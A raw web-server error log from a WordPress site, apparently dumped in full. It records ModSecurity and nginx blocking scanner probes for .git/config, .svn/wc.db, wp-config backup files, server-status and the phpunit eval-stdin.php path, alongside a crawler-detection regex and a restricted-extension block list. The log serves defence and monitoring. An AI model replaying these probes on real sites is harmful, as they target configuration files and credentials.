ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZeGUWvnq8Ejc6m--VYgUQgAAAJA"] [Fri Mar 01 06:41:35.336436 2024] [:error] [pid 3331:tid 139959251969792] [client 5.188.62.21:55146] [client 5.188.62.21] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZeG-7_nq8Ejc6m--VYgVfQAAAJM"] [Fri Mar 01 09:27:03.744120 2024] [autoindex:error] [pid 3331:tid 139959460202240] [client 89.117.56.39:57082] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Mar 01 12:03:37.664118 2024] [:error] [pid 3331:tid 139959218398976] [client 5.188.62.174:60834] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZeIKafnq8Ejc6m--VYgWxQAAAJc"] [Fri Mar 01 13:13:20.165032 2024] [:error] [pid 3460:tid 139959251969792] [client 5.188.62.21:34194] [client 5.188.62.21] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZeIawFp2wvpKdsF6YSpS0AAAANM"] [Fri Mar 01 20:15:42.998561 2024] [:error] [pid 3460:tid 139959485380352] [client 5.188.62.21:46028] [client 5.188.62.21] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZeJ9vlp2wvpKdsF6YSpZKQAAAMA"] 2024/03/02 00:43:02 [error] 3205#3205: *62203 access forbidden by rule, client: 142.93.158.96, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/03/02 00:43:03 [error] 3204#3204: *62256 access forbidden by rule, client: 142.93.158.96, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/03/02 00:43:04 [error] 3205#3205: *62276 access forbidden by rule, client: 164.90.205.35, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/03/02 00:43:16 [error] 3205#3205: *62445 access forbidden by rule, client: 207.154.240.169, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/03/02 00:43:16 [error] 3205#3205: *62454 access forbidden by rule, client: 64.227.126.135, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/03/02 00:43:31 [error] 3204#3204: *62519 access forbidden by rule, client: 207.154.240.169, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Sat Mar 02 02:50:21.837584 2024] [:error] [pid 3329:tid 139959293933312] [client 5.188.62.21:52862] [client 5.188.62.21] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZeLaPTUSjwblzzurjeCK1AAAAA4"] [Sat Mar 02 02:53:53.666280 2024] [:error] [pid 3331:tid 139959451809536] [client 5.188.62.174:52908] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZeLbEfnq8Ejc6m--VYgdIgAAAIQ"] [Sat Mar 02 03:44:25.678464 2024] [ssl:warn] [pid 31893:tid 139729405433728] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 02 03:44:33.978226 2024] [ssl:warn] [pid 31896:tid 139729405433728] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 02 03:44:34.475586 2024] [ssl:warn] [pid 31896:tid 139729405433728] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 02 03:44:36.352724 2024] [ssl:warn] [pid 31896:tid 139729405433728] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 02 03:44:38.614496 2024] [ssl:warn] [pid 32318:tid 139757320066944] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 02 03:44:46.884611 2024] [ssl:warn] [pid 32320:tid 139757320066944] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 02 09:20:16.698366 2024] [:error] [pid 32346:tid 139757128926976] [client 5.188.62.21:59280] [client 5.188.62.21] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZeM1oLOcALXYYYIDx6Cs6AAAAEE"] [Sat Mar 02 09:32:52.388290 2024] [autoindex:error] [pid 32347:tid 139757103748864] [client 141.94.87.67:59602] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/maint/index.php [Sat Mar 02 10:00:01.805105 2024] [:error] [pid 32346:tid 139756893566720] [client 5.188.62.26:60150] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZeM-8bOcALXYYYIDx6CtCQAAAFU"] [Sat Mar 02 10:00:31.649826 2024] [:error] [pid 32605:tid 139756977493760] [client 116.66.189.160:60156] [client 116.66.189.160] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZeM_D2bsFumdzw6Zo3ufgQAAAMs"] [Sat Mar 02 10:14:07.880012 2024] [ssl:warn] [pid 32320:tid 139757320066944] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 02 11:48:12.899590 2024] [:error] [pid 15764:tid 139756935530240] [client 5.188.62.26:34666] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZeNYTJ_uHbiNuZbb8kF1WwAAABA"] [Sat Mar 02 13:51:32.209079 2024] [ssl:warn] [pid 32320:tid 139757320066944] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 02 13:51:37.985540 2024] [ssl:warn] [pid 32320:tid 139757320066944] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 02 13:51:46.237133 2024] [ssl:warn] [pid 32320:tid 139757320066944] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 02 14:49:19.423732 2024] [:error] [pid 15229:tid 139757002671872] [client 34.122.70.242:38694] [client 34.122.70.242] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "698"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZeOCvyvqVM1hr7Emc0boCQAAAMg"] [Sat Mar 02 15:40:53.047792 2024] [:error] [pid 15229:tid 139757002671872] [client 5.188.62.21:40246] [client 5.188.62.21] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZeOO1SvqVM1hr7Emc0boxwAAAMg"] [Sat Mar 02 17:27:29.356223 2024] [:error] [pid 15100:tid 139757103748864] [client 5.188.62.174:42208] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZeOn0QtllcTT62ZV_EVZnQAAAAQ"] [Sat Mar 02 18:29:43.789183 2024] [:error] [pid 15229:tid 139756977493760] [client 66.36.234.130:42974] [client 66.36.234.130] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:user-agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "User-Agent"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "ZeO2ZyvqVM1hr7Emc0bqMAAAAMs"] [Sun Mar 03 03:41:15.170771 2024] [ssl:warn] [pid 16525:tid 140060270659456] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 03 03:41:27.571433 2024] [ssl:warn] [pid 16536:tid 140060270659456] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 03 03:41:27.894350 2024] [ssl:warn] [pid 16536:tid 140060270659456] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 03 03:41:29.469410 2024] [ssl:warn] [pid 16536:tid 140060270659456] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 03 03:41:31.770129 2024] [ssl:warn] [pid 16956:tid 139894784452480] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 03 03:41:36.002173 2024] [ssl:warn] [pid 16957:tid 139894784452480] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 03 14:34:48.947420 2024] [:error] [pid 16979:tid 139894500341504] [client 185.198.240.156:33022] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Sun Mar 03 14:35:17.963539 2024] [:error] [pid 16979:tid 139894366058240] [client 173.239.214.15:33082] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Sun Mar 03 16:04:39.698227 2024] [:error] [pid 16979:tid 139894382843648] [client 179.43.191.18:34544] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sun Mar 03 16:04:40.032915 2024] [:error] [pid 16981:tid 139894408021760] [client 179.43.191.18:34546] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Mon Mar 04 00:42:47.237012 2024] [ssl:warn] [pid 16957:tid 139894784452480] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 04 08:33:20.511948 2024] [ssl:warn] [pid 1022:tid 140052776667008] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 04 08:33:32.946519 2024] [ssl:warn] [pid 1884:tid 140052776667008] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 05 03:14:22.946259 2024] [ssl:warn] [pid 24012:tid 140550667192192] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 05 03:14:27.200947 2024] [ssl:warn] [pid 24013:tid 140550667192192] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 05 03:14:27.545181 2024] [ssl:warn] [pid 24013:tid 140550667192192] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 05 03:14:29.401928 2024] [ssl:warn] [pid 24013:tid 140550667192192] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 05 03:14:31.645797 2024] [ssl:warn] [pid 24430:tid 139952048179072] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 05 03:14:39.865499 2024] [ssl:warn] [pid 24436:tid 139952048179072] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 05 04:25:56.041626 2024] [:error] [pid 24458:tid 139951865431808] [client 162.221.206.110:43268] [client 162.221.206.110] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.bak"] [unique_id "ZeblJMo-8i9B8FI-B3dFagAAAIA"], referer: https://www.google.com/ [Tue Mar 05 16:39:03.589389 2024] [:error] [pid 24457:tid 139951727417088] [client 222.186.46.132:56486] [client 222.186.46.132] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "19"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZeeQ9zegm-fXpcDSVDWRvgAAAEg"] 2024/03/05 17:51:43 [error] 24412#24412: *21196 access forbidden by rule, client: 179.43.145.26, server: webmail.investigacionperu.com, request: "GET /.svn/wc.db HTTP/1.1", host: "webmail.investigacionperu.com" [Tue Mar 05 19:34:55.510169 2024] [autoindex:error] [pid 24456:tid 139951601526528] [client 137.184.45.242:34832] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2024/03/05 21:47:35 [error] 24412#24412: *24942 access forbidden by rule, client: 44.201.61.222, server: mail.investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "mail.investigacionperu.com" 2024/03/05 21:59:10 [error] 24411#24411: *25011 access forbidden by rule, client: 44.201.61.222, server: cpanel.investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "cpanel.investigacionperu.com" [Wed Mar 06 03:48:23.744903 2024] [ssl:warn] [pid 3115:tid 140084247230336] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 06 03:48:36.098244 2024] [ssl:warn] [pid 3118:tid 140084247230336] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 06 03:48:36.520968 2024] [ssl:warn] [pid 3118:tid 140084247230336] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 06 03:48:38.057701 2024] [ssl:warn] [pid 3118:tid 140084247230336] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 06 03:48:40.296103 2024] [ssl:warn] [pid 3537:tid 140641449715584] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 06 03:48:48.551954 2024] [ssl:warn] [pid 3542:tid 140641449715584] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2024/03/06 07:21:35 [error] 3519#3519: *32926 access forbidden by rule, client: 44.201.61.222, server: webmail.investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "webmail.investigacionperu.com" [Thu Mar 07 03:38:15.212096 2024] [ssl:warn] [pid 16162:tid 139998151186304] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 07 03:38:27.433631 2024] [ssl:warn] [pid 16167:tid 139998151186304] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 07 03:38:28.217298 2024] [ssl:warn] [pid 16167:tid 139998151186304] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 07 03:38:29.872310 2024] [ssl:warn] [pid 16167:tid 139998151186304] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 07 03:38:32.202286 2024] [ssl:warn] [pid 16614:tid 139745380775808] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 07 03:38:40.389293 2024] [ssl:warn] [pid 16616:tid 139745380775808] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 07 11:12:50.999391 2024] [authz_core:error] [pid 17711:tid 139744990152448] [client 167.99.184.41:57728] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/03/07 11:12:54 [error] 16595#16595: *54851 access forbidden by rule, client: 167.99.184.41, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Mar 07 14:46:22.067324 2024] [:error] [pid 17271:tid 139745082472192] [client 89.36.78.114:33926] [client 89.36.78.114] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.backup"] [unique_id "ZeoZjldea-rVn3WcW8Z7PgAAAMU"], referer: https://www.google.com/ [Thu Mar 07 19:03:34.790088 2024] [ssl:warn] [pid 16616:tid 139745380775808] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 08 02:08:14.295673 2024] [authz_core:error] [pid 15066:tid 139745023723264] [client 139.162.155.225:51072] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/03/08 02:08:18 [error] 15057#15057: *67814 access forbidden by rule, client: 139.162.155.225, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Fri Mar 08 03:03:18.843340 2024] [authz_core:error] [pid 15066:tid 139744990152448] [client 159.223.132.86:51692] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/03/08 03:03:21 [error] 15056#15056: *68221 access forbidden by rule, client: 159.223.132.86, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Fri Mar 08 03:13:28.683668 2024] [ssl:warn] [pid 28400:tid 140666080786304] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 08 03:13:32.884444 2024] [ssl:warn] [pid 28404:tid 140666080786304] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 08 03:13:33.252195 2024] [ssl:warn] [pid 28404:tid 140666080786304] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 08 03:13:35.207018 2024] [ssl:warn] [pid 28404:tid 140666080786304] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 08 03:13:37.474435 2024] [ssl:warn] [pid 28820:tid 139964203898752] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 08 03:13:41.675866 2024] [ssl:warn] [pid 28821:tid 139964203898752] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 08 03:21:38.782269 2024] [authz_core:error] [pid 29546:tid 139963790194432] [client 139.162.141.82:52008] AH01630: client denied by server configuration: /home/investig/public_html/server-status [Fri Mar 08 03:21:40.203690 2024] [authz_core:error] [pid 29546:tid 139963865728768] [client 209.38.248.17:52016] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/03/08 03:21:42 [error] 28705#28705: *68367 access forbidden by rule, client: 139.162.141.82, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/03/08 03:21:44 [error] 